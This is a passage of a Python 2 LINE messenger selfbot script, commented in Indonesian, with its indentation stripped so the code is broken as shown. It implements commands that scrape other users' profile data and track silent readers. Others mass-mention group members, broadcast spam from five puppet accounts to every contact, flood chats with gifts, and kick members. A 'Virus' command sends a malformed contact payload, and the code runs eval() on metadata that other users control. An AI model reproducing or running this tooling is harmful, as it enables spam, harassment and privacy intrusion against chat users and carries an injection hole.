contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
if "Getcontact" in msg.text:
if msg.from_ in PRANKBOT:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = acil.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
acil.sendMessage(msg)
if "Getname" in msg.text:
if msg.from_ in PRANKBOT:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
if msg.text in ["Myname"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
if msg.text in ["Mybio"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
if msg.text in ["Mypict"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Myvid"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Urlpict"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Mycover"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
cu = acil.channel.getCover(msg.from_)
path = str(cu)
acil.sendImageWithURL(msg.to, path)
if msg.text in ["Urlcover"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
cu = acil.channel.getCover(msg.from_)
path = str(cu)
acil.sendText(msg.to, path)
if "Getmid @" in msg.text:
if msg.from_ in PRANKBOT:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
acil.sendText(msg.to, g.mid)
else:
pass
if "Wc" in msg.text:
if msg.from_ in PRANKBOT:
ginfo = acil.getGroup(msg.to)
acil.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
acil.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
if "Say " in msg.text:
if msg.from_ in PRANKBOT:
bctxt = msg.text.replace("Say ","")
acil.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
#======ADMIN======
if "Help" == msg.text:
if msg.from_ in wait["ACIL"]:
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMessage1)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
acil.sendMessage(msg)
else:
acil.sendText(msg.to,helpMessage1)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
if "Me" == msg.text:
if msg.from_ in wait["ACIL"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
acil.sendMessage(msg)
h = acil.getContact(msg.from_)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if "Respon" == msg.text:
if msg.from_ in wait["ACIL"]:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
ki.sendText(msg.to,"AMAN TERKENDALI KOMANDAN 👮")
if "Getvid @" in msg.text:
if msg.from_ in wait["ACIL"]:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
if "Getcontact" in msg.text:
if msg.from_ in wait["ACIL"]:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = acil.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
acil.sendMessage(msg)
if "Getname" in msg.text:
if msg.from_ in wait["ACIL"]:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
if msg.text in ["Myname"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
if msg.text in ["Mybio"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
if msg.text in ["Mypict"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Myvid"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Urlpict"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Mycover"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
cu = acil.channel.getCover(msg.from_)
path = str(cu)
acil.sendImageWithURL(msg.to, path)
if msg.text in ["Urlcover"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
cu = acil.channel.getCover(msg.from_)
path = str(cu)
acil.sendText(msg.to, path)
if "Getmid @" in msg.text:
if msg.from_ in wait["ACIL"]:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
acil.sendText(msg.to, g.mid)
else:
pass
if "Wc" in msg.text:
if msg.from_ in wait["ACIL"]:
ginfo = acil.getGroup(msg.to)
acil.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
acil.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
if "Say " in msg.text:
if msg.from_ in wait["ACIL"]:
bctxt = msg.text.replace("Say ","")
acil.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
if "Youinfo" in msg.text:
if msg.from_ in wait["ACIL"]:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
acil.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
acil.sendText(msg.to,"Profile Picture " + contact.displayName)
acil.sendImageWithURL(msg.to,image)
acil.sendText(msg.to,"Cover " + contact.displayName)
acil.sendImageWithURL(msg.to,path)
except:
pass
if "Tagall" in msg.text:
if msg.from_ in wait["ACIL"]:
group = acil.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki.sendMessage(msg)
if "Sider:on" in msg.text:
if msg.from_ in wait["ACIL"]:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
wait["Sider"] = True
acil.sendText(msg.to,"Siap On Cek Sider")
if "Sider:off" in msg.text:
if msg.from_ in wait["ACIL"]:
cctv['cyduk'][msg.to]=False
wait["Sider"] = False
acil.sendText(msg.to, "Cek Sider Off")
if "Github " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Github ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type: GitHub Search\nStatus: Processing...")
acil.sendText(msg.to, "Title: " + a + "\nLink: https://github.com/search?utf8=✓&q="+b)
if "Playstore " in msg.text:
tob = msg.text.replace("Playstore ","")
acil.sendText(msg.to,"Please wait...")
acil.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
acil.sendText(msg.to,"This is link aplication")
if "Wikipedia " in msg.text:
if msg.from_ in wait["ACIL"]:
try:
wiki = msg.text.replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except Exception as e:
acil.sendText(msg.to, str(e))
if "Twitter " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Twitter ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Processing")
acil.sendText(msg.to, "https://www.twitter.com" + b)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Success")
if "Smule " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Smule ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching to id smule..")
acil.sendText(msg.to, "Nama: "+b+"\nId smule: http://smule.com/" +b)
#------------------------------------------------------------
if msg.text in ["Invite:user"]:
if msg.from_ in wait["ACIL"]:
wait["invite"] = True
acil.sendText(msg.to,"send contact 😉")
if "Google " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Google ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching google..")
acil.sendText(msg.to, "Search: "+b+"\nsuccess: http://google.com/" +b)
if "Xvideos " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Xvideos ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching ....\n" "Type:Search Xvideos\nStatus: Processing")
acil.sendText(msg.to, "{ Xvideos search page }\n\nTitle: "+b+"\nSource : Xvideos\nhttp://xvideos.com/?k=" +b)
if "Picturl @" in msg.text:
if msg.from_ in wait["ACIL"]:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
if "Coverurl @" in msg.text:
if msg.from_ in wait["ACIL"]:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
acil.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
acil.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
acil.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
acil.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
acil.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
acil.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
acil.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
acil.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
acil.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = acil.getContact(msg.contentMetadata["mid"])
try:
cu = acil.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
acil.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = acil.getContact(msg.contentMetadata["mid"])
try:
cu = acil.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
try:
acil.sendImageWithURL(msg.to, "http://dl.profile.line-cdn.net/" + contact.pictureStatus)
except:
cu = ""
acil.sendText(msg.to,"🎀═displayName═🎀\n✤[" + contact.displayName + "]✤\n🎀═MIDs═🎀\n✤[" + msg.contentMetadata["mid"] + "]✤\n🎀═StatusContact═🎀\n✤" + contact.statusMessage + "✤")
acil.sendText(msg.to,"LINKPROFILE\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\nLINKBERANDA\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
acil.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Botallbye"]: #asist akan keluar dari smua grup
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh selfbot...!!!\nMakasih...!!!")
else:
acil.sendText(msg.to,"He declined all invitations")
#--------------------------
elif msg.text in ["Leaveallgroup"]: #selfbot akan keluar dari semua grup
gid = acil.getGroupIdsJoined()
for i in gid:
acil.leaveGroup(i)
if wait["lang"] == "JP":
acil.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh selfbot...!!!\nMakasih...!!!")
else:
acil.sendText(msg.to,"He declined all invitations")
#----------------------------------------------
elif "Sendgrup " in msg.text: #ini broadcast sob
bctxt = msg.text.replace("Sendgrup ", "")
n = acil.getGroupIdsJoined()
for manusia in n:
acil.sendText(manusia, (bctxt))
elif "Sendcontact " in msg.text: #SEMUA BOT AKAN BROADCAST KE SEMUA KONTAKNYA
bctxt = msg.text.replace("Sendcontact ", "")
t = ki.getAllContactIds()
t = ki2.getAllContactIds()
t = ki3.getAllContactIds()
t = ki4.getAllContactIds()
t = ki5.getAllContactIds()
for manusia in t:
ki.sendText(manusia,(bctxt))
ki2.sendText(manusia,(bctxt))
ki3.sendText(manusia,(bctxt))
ki4.sendText(manusia,(bctxt))
ki5.sendText(manusia,(bctxt))
elif "Sendpm " in msg.text: #SB AKAN BROADCAST KE SEMUA TMN NYA
bctxt = msg.text.replace("Sendpm ", "")
t = acil.getAllContactIds()
for manusia in t:
acil.sendText(manusia, (bctxt))
elif "Virus" in msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': "BEBAS,'"}
acil.sendMessage(msg)
elif msg.text in ["Stafflist"]:
if Bots == []:
acil.sendText(msg.to,"The Friends is empty")
else:
acil.sendText(msg.to,"Tunggu...")
mc = "||===FRIENDLIST===||\n=====================\n"
for mi_d in Bots:
mc += "★" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
print "[Command]Friendlist executed"
elif "Youinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
acil.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
acil.sendText(msg.to,"Profile Picture " + contact.displayName)
acil.sendImageWithURL(msg.to,image)
acil.sendText(msg.to,"Cover " + contact.displayName)
acil.sendImageWithURL(msg.to,path)
except:
pass
elif "Botak" in msg.text:
group = acil.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki.sendMessage(msg)
elif "Github " in msg.text:
a = msg.text.replace("Github ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type: GitHub Search\nStatus: Processing...")
acil.sendText(msg.to, "Title: " + a + "\nLink: https://github.com/search?utf8=✓&q="+b)
elif 'playstore ' in msg.text.lower():
tob = msg.text.lower().replace('playstore ',"")
acil.sendText(msg.to,"Please wait...")
acil.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
acil.sendText(msg.to,"This is link aplication")
elif "Wikipedia " in msg.text:
try:
wiki = msg.text.lower().replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except Exception as e:
acil.sendText(msg.to, str(e))
elif "Twitter " in msg.text:
a = msg.text.replace("Twitter ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Processing")
acil.sendText(msg.to, "https://www.twitter.com" + b)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Success")
elif "Smule " in msg.text:
a = msg.text.replace("Smule ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching to id smule..")
acil.sendText(msg.to, "Nama: "+b+"\nId smule: http://smule.com/" +b)
elif "Google " in msg.text:
a = msg.text.replace("Google ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching google..")
acil.sendText(msg.to, "Search: "+b+"\nsuccess: http://google.com/" +b)
elif "Xvideos " in msg.text:
a = msg.text.replace("Xvideos ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching ....\n" "Type:Search Xvideos\nStatus: Processing")
acil.sendText(msg.to, "{ Xvideos search page }\n\nTitle: "+b+"\nSource : Xvideos\nhttp://xvideos.com/?k=" +b)
elif "Picturl @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Coverurl @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif msg.text in ["Pmfavorite"]:
dj = acil.getFavoriteMids()
kontak = acil.getContacts(dj)
num = 1
family = str(len(dj))
msgs = "[List Favorite Friends Guys]"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\nTotal Friend : %i" % len(kontak)
acil.sendText(msg.to, msgs)
elif msg.text.lower() == 'setauto':
acil.sendText(msg.to,helpFun)
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMessage)
else:
acil.sendText(msg.to,helpMessage)
elif msg.text.lower() == 'media':
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMedia)
else:
acil.sendText(msg.to,helpMedia)
elif msg.text.lower() == 'helpbots':
if wait["lang"] == "JP":
ki.sendText(msg.to,helpself)
else:
acil.sendText(msg.to,helpself)
elif msg.text.lower() == 'settings':
if wait["lang"] == "JP":
acil.sendText(msg.to,helpset)
else:
acil.sendText(msg.to,helpset)
elif ("Gn:" in msg.text):
if msg.toType == 2:
group = acil.getGroup(msg.to)
group.name = msg.text.replace("Gn:","")
ki.updateGroup(group)
else:
acil.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok👈")
elif ("Gn " in msg.text):
if msg.toType == 2:
group = acil.getGroup(msg.to)
group.name = msg.text.replace("Gn ","")
acil.updateGroup(group)
else:
acil.sendText(msg.to,"Can not be used for groups other than")
elif "Kick:" in msg.text:
midd = msg.text.replace("Kick:","")
acil.kickoutFromGroup(msg.to,[midd])
elif "Invite:" in msg.text:
midd = msg.text.replace("Invite:","")
acil.findAndAddContactsByMid(midd)
acil.inviteIntoGroup(msg.to,[midd])
elif "Me" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
acil.sendMessage(msg)
eltime = time.time() - mulai
van = "Bot has been active "+waktu(eltime)
acil.sendText(msg.to,van)
elif "Mybots" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
acil.sendMessage(msg)
elif "Respon" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
ki.sendText(msg.to,"AMAN TERKENDALI KOMANDAN 👮")
elif "B1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "B2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "B3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "B4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "B5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif "Creator" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
acil.sendMessage(msg)
elif msg.text in ["Allgift","B1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","i gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
acil.sendMessage(msg)
elif msg.text in ["Allgift","B2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Allgift","B3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Allgift","B4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","B5 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki5.sendMessage(msg)
elif msg.text in ["Spam gift"]:
#if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
elif msg.text in ["Clink"]:
if msg.toType == 2:
group = acil.getGroup(msg.to)
group.preventJoinByTicket = False
acil.updateGroup(group)
if wait["lang"] == "JP":
acil.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
acil.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
if wait["lang"] == "JP":
acil.sendText(msg.to,"It can not be used outside the group👈")
else:
acil.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Curl"]:
if msg.toType == 2:
group = acil.getGroup(msg.to)
group.preventJoinByTicket = True
acil.updateGroup(group)
if wait["lang"] == "JP":
acil.sendText(msg.to,"URL close 👈")
else:
acil.sendText(msg.to,"URL close 👈")
else:
if wait["lang"] == "JP":
acil.sendText(msg.to,"It can not be used outside the group 👈")
else:
acil.sendText(msg.to,"Can not be used for groups other than ")
elif msg.text.lower() == 'ginfo':
group = acil.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md ="✥GROUP NAME✥\n" + group.name + "\n\n✥GROUP ID✥\n✿" + group.id +"✿" "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\n✥TOTAL MEMBER✥\n" + str(len(group.members)) + " Orang" + "\n✥PENDINGAN✥\n" + str(len(group.invitee)) + " Orang"
acil.sendText(msg.to,md)
elif "Mymid" == msg.text:
acil.sendText(msg.to,mid)
elif "B1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "B2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "B3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "B4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "B5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "All mid" == msg.text:
acil.sendText(msg.to,mid)
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
